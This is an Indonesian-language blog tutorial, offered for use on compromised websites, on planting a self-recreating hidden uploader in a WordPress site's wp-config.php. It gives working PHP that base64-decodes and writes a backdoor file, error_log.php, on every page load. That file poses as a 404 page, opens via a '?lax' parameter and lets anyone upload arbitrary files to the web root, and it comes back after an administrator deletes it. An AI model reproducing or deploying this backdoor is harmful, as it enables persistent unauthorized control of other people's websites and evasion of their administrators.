auto create hidden uploader with config

auto create hidden uploader with config
yeah kali ini saya akan membagi sedikit cara membuat auto create hidden uploader lewat config

kita menggunakan perantara config karena setiap kita buka web maka config pasti berjalan , nah jika kita tempelkan script auto create hidden uploader di file config maka hidden uploader kita selalu create terus menerus , walaupun nanti di hapus oleh seorang admin atau attacker lain , nanti hidden uploader kita bakal ke create lagi

langsung saja , kali ini saya memberi tutorial untuk Wordpress , kalo untuk web lain kapan kapan ya soalnya blom ada live target wkwkwk  :v

1. kita buka file wp-config.php 




bisa kita lihat di file wp-config.php bahwa di bagian pertama file ada syntax <?php namun di bagian bawah tidak ada penutup syntax ?> maka kita tutup terlebih dahulu , seperti pada gambar di bawah ini




nah setelah kita tutup dengan syntax ?> , kita langsung enter di bagian bawah dan paste kan script di bawah ini


<?php
$config = base64_decode('PD9waHANCmVjaG8gIjxodG1sPg0KPGhlYWQ+DQogPHRpdGxlPjQwNCBOb3QgRm91bmQ8L3RpdGxlPg0KPC9oZWFkPg0KICAgICAgPGgxPk5vdCBGb3VuZDwvaDE+DQogICAgICA8cD5UaGUgcmVxdWVzdGVkIFVSTCAiLiRfU0VSVkVSW1JFUVVFU1RfVVJJXS4iIHdhcyBub3QgZm91bmQgb24gdGhpcyBzZXJ2ZXIuPC9wPg0KDQogICAgICANCjxhZGRyZXNzPkFkZGl0aW9uYWxseSwgYSA0MDQgTm90IEZvdW5kIGVycm9yIHdhcyBlbmNvdW50ZXJlZCB3aGlsZSB0cnlpbmcgdG8gdXNlIGFuIEVycm9yRG9jdW1lbnQgdG8gaGFuZGxlIHRoZSByZXF1ZXN0LjwvYWRkcmVzcz4NCiI7DQppZihpc3NldCgkX0dFVFsibGF4Il0pKXsNCmVjaG8gIg0KPGJvZHkgYmdjb2xvcj0nZ3JleSc+PGZvbnQgY29sb3I9J3JlZCc+DQo8Y2VudGVyPg0KPHByZT4NCiBfICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIF8gICAgICAgICAgICAgICAgICAgICAgIF8gICAgICAgICAgICAgICANCnwgfCAgICAgICBfXyBfICBfXyAgX18gICAgICAgICAgXyAgIF8gICBfIF9fICAgfCB8ICAgX19fICAgICBfXyBfICAgIF9ffCB8ICAgX19fICAgXyBfXyANCnwgfCAgICAgIC8gX2AgfCBcIFwvIC8gIF9fX19fICB8IHwgfCB8IHwgJ18gXCAgfCB8ICAvIF8gXCAgIC8gX2AgfCAgLyBfYCB8ICAvIF8gXCB8ICdfX3wNCnwgfF9fXyAgfCAoX3wgfCAgPiAgPCAgfF9fX19ffCB8IHxffCB8IHwgfF8pIHwgfCB8IHwgKF8pIHwgfCAoX3wgfCB8IChffCB8IHwgIF9fLyB8IHwgICANCnxfX19fX3wgIFxfXyxffCAvXy9cX1wgICAgICAgICAgXF9fLF98IHwgLl9fLyAgfF98ICBcX19fLyAgIFxfXyxffCAgXF9fLF98ICBcX19ffCB8X3wgICANCkhpZGRlbiBVcGxvYWRlciBieSBMQW1vbmdhbiBYcGxvaXRlciAgIHxffCAgIENvZGVkIEJ5IENZQkVSU0NSWSAgICAgICAgICAgICAgICAgICAgICAgICANCjwvcHJlPjwvZm9udD4NCjxmb250IGNvbG9yPSdjeWFuJz4iLnBocF91bmFtZSgpLiI8L2ZvbnQ+PGJyPg0KPGZvbnQgY29sb3IgPSdnb2xkJz5TZXJ2ZXIgSVA6IDwvZm9udD4NCjxmb250IGNvbG9yPSdsaW1lJz4iLmdldGhvc3RieW5hbWUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKS4iIDwvZm9udD4NCjxmb250IGNvbG9yPSdnb2xkJz5Zb3VyIElQOiA8L2ZvbnQ+DQo8Zm9udCBjb2xvcj0nbGltZSc+Ii4kX1NFUlZFUlsnUkVNT1RFX0FERFInXS4iPC9mb250Pjxicj4NCjxmb250IGNvbG9yPSdnb2xkJz5EaXI6IDwvZm9udD48Zm9udCBjb2xvcj0nbGltZSc+Ii4kX1NFUlZFUltTQ1JJUFRfRklMRU5BTUVdLiI8L2ZvbnQ+IjsNCmVjaG8gIjxmb3JtIG1ldGhvZD0ncG9zdCcgZW5jdHlwZT0nbXVsdGlwYXJ0L2Zvcm0tZGF0YSc+DQoJICA8aW5wdXQgdHlwZT0nZmlsZScgbmFtZT0naWR4X2ZpbGUnPg0KCSAgPGlucHV0IHR5cGU9J3N1Ym1pdCcgbmFtZT0ndXBsb2FkJyB2YWx1ZT0ndXBsb2FkJz4NCgkgIDwvZm9ybT4iOw0KJHJvb3QgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddOw0KJGZpbGVzID0gJF9GSUxFU1snaWR4X2ZpbGUnXVsnbmFtZSddOw0KJGRlc3QgPSAkcm9vdC4nLycuJGZpbGVzOw0KaWYoaXNzZXQoJF9QT1NUWyd1cGxvYWQnXSkpIHsNCglpZihpc193cml0YWJsZSgkcm9vdCkpIHsNCgkJaWYoQGNvcHkoJF9GSUxFU1snaWR4X2ZpbGUnXVsndG1wX25hbWUnXSwgJGRlc3QpKSB7DQoJCQkkd2ViID0gImh0dHA6Ly8iLiRfU0VSVkVSWydIVFRQX0hPU1QnXS4iLyI7DQoJCQllY2hvICJ1cGxvYWQgc3VjY2VzcyA+IDxhIGhyZWY9JyR3ZWIvJGZpbGVzJyB0YXJnZXQ9J19ibGFuayc+PGI+PHU+JHdlYi8kZmlsZXM8L3U+PC9iPjwvYT4iOw0KCQl9IGVsc2Ugew0KCQkJZWNobyAidXBsb2FkIGZhaWxlZCBpbiBmb2xkZXIgcm9vdCI7DQoJCX0NCgl9IGVsc2Ugew0KCQlpZihAY29weSgkX0ZJTEVTWydpZHhfZmlsZSddWyd0bXBfbmFtZSddLCAkZmlsZXMpKSB7DQoJCQllY2hvICJ1cGxvYWQgc3VjY2VzcyA8Yj4kZmlsZXM8L2I+IGluIHRoaXMgZm9sZGVyIjsNCgkJfSBlbHNlIHsNCgkJCWVjaG8gImZhaWxlZCI7DQoJCX0NCgl9DQp9DQp9DQo/Pg==');
$file = fopen("error_log.php","w");
if (file_exists("config")){
}else{
        echo fwrite($file,"$config");
        fclose($file);
}
?>


error_log.php di atas adalah file hidden uploader yang tertanam nanti , jadi bisa di ganti ganti terserah kalian nama file hidden uploader kita nanti



hasilnya seperti gambar di atas dan kita klik save



    cara kerja nya . jika ada seseorang yang membuka web tersebut , maka script kita berjalan dan langsung membuat hidden uploader , yang tempat nya adalah /error_log.php
 
 cara memanggil uploader nya :

 /error_log.php?lax

maka akan muncul hidden uploader kita ,





     semisal sewaktu waktu hidden uploader kita di hapus oleh seseorang , jangan khawatir . nanti bakal auto create hidden uploader lagi kok :3 yang penting orang nya tidak menghapus script kita yang berada di dalem config maka aman aman aja hidden uploader kita hehehe



sekian tutorial dari saya semoga bermanfaat

Share This :